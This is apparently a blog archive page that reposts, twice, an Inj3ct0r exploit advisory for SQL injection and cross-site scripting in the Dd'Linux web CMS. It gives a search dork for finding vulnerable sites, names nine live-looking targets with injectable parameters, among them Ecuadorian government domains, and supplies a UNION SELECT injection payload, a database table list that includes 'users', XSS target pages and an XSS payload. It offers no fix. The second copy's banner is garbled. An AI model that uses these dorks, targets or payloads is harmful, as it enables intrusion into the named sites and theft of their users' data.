Tag Archive for Dd’Linux sql injection

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities açıkları bulundu. Açık hakkındaki açıklamalar şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0      _                   __           __       __                      1 
1    /' \            __  /'__`\        /\ \__  /'__`\                    0 
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1 
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0 
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1 
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0 
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1 
1                   \ \____/ >> Exploit database separated by exploit    0 
0                    \/___/          type (local, remote, DoS, etc.)     1 
1                                                                        1 
0   [x] Official Website: http://www.1337day.com                         0 
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1 
0                                                                        0 
1               ==========================================               1 
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1 
1               ==========================================               0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 
|                                                                        | 
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    |  
-------------------------------------------------------------------------- 
 
+----------------| ABOUT ME |--------------------+ 
NAME:     TAURUS OMAR                            - 
HOME:     ACCESOILEGAL.BLOGSPOT.COM              - 
FBOOK:                    - 
TWITTER:                             - 
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  - 
E-MAIL:   omar-taurus[at]live[dot]com            - 
PWNED:    #ZUUU                                  - 
+------------------------------------------------+ 
 
# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities 
# Vendor Name: Dd'linux 
# Url Vendor: http://www.ddlinux.com/ 
# Category: WebApps 
# Type: php 
# Risk:  Critical 
# Dork: intext:"Desarrollado por dd'linux"
 
# Example/Sql=> http//site.com/xxxx?id=1 
# Example/Xss=> http//site.com/search.php [XSS] 
 
 
# Sample/Sql  
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%' 
http://www.babahoyo.gob.ec/pagina.php?id=6%' 
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%' 
http://www.coac-sanfra.com/pagina.php?id=1%' 
http://www.chibuleo.com/novedad.php?codigo=3%' 
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%' 
http://www.galapagostech.com/index.php?id=1%' 
http://www.fmrumba.com/contactenos.php?id=7%' 
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%' 
 
# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL# 
 
# Info => Same Tables and Columns All Vulnerability Site's 
+-------------------------+ 
| agenda                  | 
| album                   | 
| banner                  | 
| banner_ubicacion        | 
| contador                | 
| imagen                  | 
| imagenes_animacion      | 
| mails                   | 
| mails_paginas           | 
| noticia                 | 
| opcion                  | 
| opcion1                 | 
| opcion2                 | 
| opciones                | 
| opciones1               | 
| transparencia_archivo   | 
| transparencia_categoria | 
| users                   | 
| varios                  | 
+-------------------------+ 
 
# Sample/Xss 
http://david.ddlinux.com/buscar.php 
http://www.fmrumba.com/buscar.php 
http://www.babahoyo.gob.ec/buscar.php 
 
# Comand/Xss/=> "><img src=x onerror=alert("1337");>   
 
# Vulnerability/Code 
<tbody><tr> 
<td><input name="busqueda" id="busqueda" value="" size="15" type="text"> 
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td> 
</tr> 
</tbody>  

Dd'Linux – SQL Injection / Cross-Site Scripting Vulnerabilities

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities açıkları bulundu. Açık hakkındaki açıklamalar şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /'             __  /'__`        / __  /'__`                    0
0   /_,     ___   /_/_      ___  ,_/ /   _ ___            1
1   /_/  /' _ ` / /_/__<_  /'___  /    /`'__           0
0        / /    /   / __/  _  _   /            1
1        _ _ __   ____/ ____\ __\ ____/ _            0
0        /_//_//_/ _ /___/  /____/ /__/ /___/  /_/            1
1                    ____/ >> Exploit database separated by exploit    0
0                    /___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    |
--------------------------------------------------------------------------

+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
FBOOK:                    -
TWITTER:                             -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+

# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities
# Vendor Name: Dd'linux
# Url Vendor: http://www.ddlinux.com/
# Category: WebApps
# Type: php
# Risk:  Critical
# Dork: intext:"Desarrollado por dd'linux"

# Example/Sql=> http//site.com/xxxx?id=1
# Example/Xss=> http//site.com/search.php [XSS]


# Sample/Sql
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%'
http://www.babahoyo.gob.ec/pagina.php?id=6%'
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%'
http://www.coac-sanfra.com/pagina.php?id=1%'
http://www.chibuleo.com/novedad.php?codigo=3%'
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%'
http://www.galapagostech.com/index.php?id=1%'
http://www.fmrumba.com/contactenos.php?id=7%'
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%'

# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL#

# Info => Same Tables and Columns All Vulnerability Site's
+-------------------------+
| agenda                  |
| album                   |
| banner                  |
| banner_ubicacion        |
| contador                |
| imagen                  |
| imagenes_animacion      |
| mails                   |
| mails_paginas           |
| noticia                 |
| opcion                  |
| opcion1                 |
| opcion2                 |
| opciones                |
| opciones1               |
| transparencia_archivo   |
| transparencia_categoria |
| users                   |
| varios                  |
+-------------------------+

# Sample/Xss
http://david.ddlinux.com/buscar.php
http://www.fmrumba.com/buscar.php
http://www.babahoyo.gob.ec/buscar.php

# Comand/Xss/=> "><img src=x onerror=alert("1337");>

# Vulnerability/Code
<tbody><tr>
<td><input name="busqueda" id="busqueda" value="" size="15" type="text">
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td>
</tr>
</tbody>